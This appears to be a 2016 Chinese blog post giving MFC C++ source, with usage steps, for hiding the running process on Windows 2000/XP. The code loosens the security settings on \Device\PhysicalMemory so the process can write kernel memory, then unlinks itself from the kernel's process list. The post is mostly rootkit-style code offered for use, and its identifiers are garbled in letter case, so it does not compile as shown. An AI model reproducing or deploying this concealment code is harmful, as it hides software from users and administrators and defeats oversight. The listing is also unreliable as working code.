wsyscheck
MFC隐藏进程
只要把cpp和h加入工程,include就可以了。
代码地址:
//------------------HideProcess.h--------------------
// Public entry point: add HideProcess.h/.cpp to an MFC project and call this.
// The definition is at the end of HideProcess.cpp; as written it always returns TRUE.
BOOL HideProcess();
//------------------HideProcess.cpp------------------
#include "stdafx.h"
#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>
#include"HideProcess.h"
// Local re-declarations of the native-API status codes, structures and
// function-pointer types needed to call ZwOpenSection and RtlInitUnicodeString
// through pointers resolved from ntdll.dll at run time.
// NOTE(review): several identifiers in this listing differ in letter case between
// their definition and their use (for example the access-denied status macro below
// and the g_pMAPPhysicalMemory global), so the listing does not compile as posted.
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_denied ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
// Declared for completeness; no function in this file uses IO_STATUS_BLOCK.
typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
// Counted UTF-16 string used for native object names.
typedef struct _unicode_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Object-attribute flags; OpenPhysicalMemory passes Attributes = 0, so none of
// these flags is actually used in this file.
#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INsensitive 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_handle 0x00000200L
#define OBJ_valid_ATTRIBUTES 0x000003F2L
// Names the object to open (here: the physical-memory section) for ZwOpenSection.
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
// Signature of ntdll!ZwOpenSection as this file calls it.
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
// Signature of ntdll!RtlInitUnicodeString as this file calls it.
typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
// Function pointers filled in by InitNTDLL via GetProcAddress.
RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
// Module handle of ntdll.dll (set by InitNTDLL, cleared by CloseNTDLL).
HMODULE g_hNtDLL = NULL;
// Intended to hold the mapped view created in OpenPhysicalMemory; the functions
// below spell this name with different letter case (see the note at the top).
PVOID g_pMAPPhysicalMemory = NULL;
// Handle to the \Device\PhysicalMemory section, set by OpenPhysicalMemory.
HANDLE g_hMPM = NULL;
// OS version filled by GetVersionEx; selects the hard-coded offsets used later.
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
// Loads ntdll.dll and resolves the two native exports this file calls through
// the global function pointers RtlInitUnicodeString and ZwOpenSection.
// Returns false when the library cannot be loaded, TRUE otherwise.
// The GetProcAddress results are not checked, so TRUE does not guarantee that
// either pointer is non-NULL.
BOOL InitNTDLL()
{
g_hNtDLL = loadlibrary("ntdll.dll");
if (NULL == g_hNtDLL)
return false;
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress(g_hNtDLL, "ZwOpenSection");
return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
    // Nothing to release when ntdll.dll was never loaded (or was already released).
    if (g_hNtDLL == NULL)
    {
        return;
    }

    // Drop the module reference and clear the global so a repeated call is a no-op.
    FreeLibrary(g_hNtDLL);
    g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
// Rewrites the DACL of the section object behind hSection so that the current
// user is granted SECTION_MAP_WRITE. The caller must have opened hSection with
// READ_CONTROL|WRITE_DAC (OpenPhysicalMemory does so).
//
// Security note: SetSecurityInfo on SE_KERNEL_OBJECT changes the security
// descriptor of the object itself, not only of this handle, so the weakened DACL
// applies to every later opener of the section. A non-default DACL on
// \Device\PhysicalMemory is therefore an artefact worth checking during triage.
//
// NOTE(review): each error branch frees pSD/pNewDacl but does not return, so
// execution continues with the remaining steps and the same pointers can be
// passed to LocalFree again. On the success path neither pSD nor pNewDacl is freed.
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;
// Read the existing DACL; pSD owns the memory that pDacl points into.
Dword dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, &pDacl, NULL, &pSD);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
localFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
// One access-allowed entry: SECTION_MAP_WRITE for the calling user, not inherited.
explicit_ACCESS ea;
Rtlzeromemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccesspermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance = NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
// Merge the new entry with the existing DACL into a newly allocated ACL.
dwRes = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
LocalFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
// Apply the merged DACL to the section object.
dwRes = SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL);
if(ERROR_SUCCESS != dwRes)
{
if(pSD)
{
LocalFree(pSD);
}
if(pNewDacl)
{
LocalFree(pNewDacl);
}
}
}
//---------------------------------------------------------------------------
// Opens the \Device\PhysicalMemory section for read/write mapping and maps one
// 4 KiB page at a hard-coded physical offset into this process.
// Returns the section handle (also stored in g_hMPM) on success, NULL on failure.
//
// Scope: the function refuses to run unless the OS reports version 5.0 or 5.1
// (the source comments label these "2k" and "xp"). Microsoft removed user-mode
// access to \Device\PhysicalMemory starting with Windows Server 2003 SP1, so the
// approach does not carry over to later systems.
//
// NOTE(review): the hard-coded offsets 0x30000 / 0x39000 are used by LinearToPhys
// as the base of a page directory; presumably they are the kernel page-directory
// physical address on a non-PAE system of that version (confirm before relying on it).
// NOTE(review): in the access-denied branch the status of the WRITE_DAC open is
// not checked before g_hMPM is used, and when MapViewOfFile fails the section
// handle is left open.
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion)
{
return NULL;
}
// Pick the version-specific physical offset; any other minor version is rejected.
switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; //2k
case 1:
PhyDirectory = 0x39000;
break; //xp
default:
return NULL;
}
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
{
// Write access was refused: reopen with rights to edit the DACL, grant the
// current user SECTION_MAP_WRITE, then retry the read/write open.
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}
if(!NT_SUCCESS(status))
{
return NULL;
}
// Map the single page at PhyDirectory; this view is never unmapped in this file.
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
//---------------------------------------------------------------------------
// Translates a virtual address to a physical address by walking a two-level
// page table by hand. The bit split used (10-bit directory index, 10-bit table
// index, 12-bit offset) matches 32-bit x86 paging without PAE.
//   BaseAddress  mapped view of the page directory (1024 ULONG entries)
//   addr         virtual address to translate
// Returns the physical address as a PVOID, or 0 when the directory entry or the
// page-table entry has its present bit (bit 0) clear.
//
// NOTE(review): 0 doubles as the failure value and as a legal physical address,
// and the callers in this file do not check for it. The MapViewOfFile result is
// not checked before it is dereferenced, and the early return for a non-present
// PTE skips UnmapViewOfFile, leaking that view. The pointer-to-ULONG casts assume
// a 32-bit build.
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr, PGDE, PTE, PAddr;
// Top 10 bits of the address select the page-directory entry.
PGDE = BaseAddress[VAddr>>22];
if (0 == (PGDE&1))
{
return 0;
}
// Bit 7 set: the entry maps a 4 MiB page directly, with no second level.
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
// Map the page table the entry points at (access value 4 is FILE_MAP_READ),
// then index it with address bits 12..21.
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if (0 == (PTE&1))
{
return 0;
}
PAddr = (PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
// Reads one 32-bit word from the virtual address addr by translating it with
// LinearToPhys and temporarily mapping the physical page that contains it.
// Returns the word read, or 0 when the page cannot be mapped; a stored value of
// 0 is indistinguishable from that failure.
// NOTE(review): a failed translation (phys == 0) is not detected; the function
// then maps physical page 0 and returns its first word.
ULONG GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
// Map the 4 KiB page containing phys; the low 12 bits select the word inside it.
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys&0xfffff000, 0x1000);
if (0 == tmp)
{
return 0;
}
ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
//---------------------------------------------------------------------------
// Writes one 32-bit word to the virtual address addr by translating it with
// LinearToPhys and temporarily mapping the physical page that contains it.
// Returns TRUE after the store, FALSE when the page cannot be mapped.
//
// Stability note: the store goes straight into physical memory from user mode;
// no locking or other coordination with the kernel is visible here.
// NOTE(review): a failed translation (phys == 0) is not detected, in which case
// the word is written into physical page 0 instead of the intended location.
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp)
{
return FALSE;
}
tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);
return TRUE;
}
//---------------------------------------------------------------------------
// Exception-filter callback that terminates the process with exit code 0.
// It is only referenced by the commented-out SetUnhandledExceptionFilter call in
// YHideProcess, so it is not installed as written. ExitProcess does not return,
// which makes the trailing return statement unreachable in practice.
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1;
}
//---------------------------------------------------------------------------
// Unlinks the calling process from a kernel doubly-linked list by editing
// physical memory from user mode (direct kernel object manipulation).
// Returns FALSE when ntdll cannot be loaded or the physical-memory section cannot
// be opened, TRUE otherwise; the results of GetData/SetData are not checked, so
// TRUE does not mean the list was actually modified.
//
// Steps, as the code shows them:
//   1. read the word at the fixed address 0xFFDFF124 (source comment: "kteb"),
//   2. read the word at +0x44 from that value (source comment: "kpeb"),
//   3. read the forward/backward links at a version-specific offset inside it
//      (0xa0/0xa4 for minor version 0, 0x88/0x8c for minor version 1),
//   4. make the two neighbours point at each other, skipping this entry.
// Presumably the list is the kernel's active-process list; the fixed address and
// offsets are specific to the OS builds this was written for.
//
// Detection: only the list walked by the usual process-enumeration APIs is
// changed. The process object, its threads and its handles remain, so cross-view
// comparison (process list versus thread, handle-table or pool-scan views, as
// memory-forensics tools do) still reveals it. A modified DACL on
// \Device\PhysicalMemory is a second artefact.
//
// NOTE(review): the view stored in g_pMapPhysicalMemory is not unmapped before
// the section handle is closed.
BOOL YHideProcess()
{
// SetUnhandledExceptionFilter(exeception);
if (FALSE == InitNTDLL())
{
return FALSE;
}
if (0 == OpenPhysicalMemory())
{
return FALSE;
}
ULONG thread = GetData((PVOID)0xFFDFF124); //kteb
ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
ULONG fw, bw;
// OpenPhysicalMemory has already rejected every minor version other than 0
// and 1, so exactly one of the two branches below assigns fw and bw.
if (0 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
if (1 == g_osvi.dwMinorVersion)
{
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}
// next->back = prev; prev->forward = next. This entry's own links are left as is.
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);
CloseHandle(g_hMPM);
CloseNTDLL();
return TRUE;
}
BOOL HideProcess()
{
    // One-shot guard: YHideProcess is attempted at most once per process,
    // whether or not that attempt succeeded.
    static BOOL b_hide = false;

    if (b_hide)
    {
        return TRUE;
    }

    b_hide = true;
    // The result of YHideProcess is discarded, so callers always get TRUE and
    // cannot tell from the return value whether anything was changed.
    YHideProcess();
    return TRUE;
}
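然后在 Example 工程的 Example.h 中加入
#include <HideProcess.h>
在 Example 工程的 Example.cpp 中的
BOOL CExampleApp::InitInstance()
里加入
HideProcess();
即可。注意:上面的代码只在 Windows 2000/XP 上生效(OpenPhysicalMemory 要求 dwMajorVersion 为 5 且 dwMinorVersion 为 0 或 1);在其他系统上 HideProcess() 仍然返回 TRUE,但不会做任何修改。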
-------
文章最后发布于: 2016-06-06 12:19:39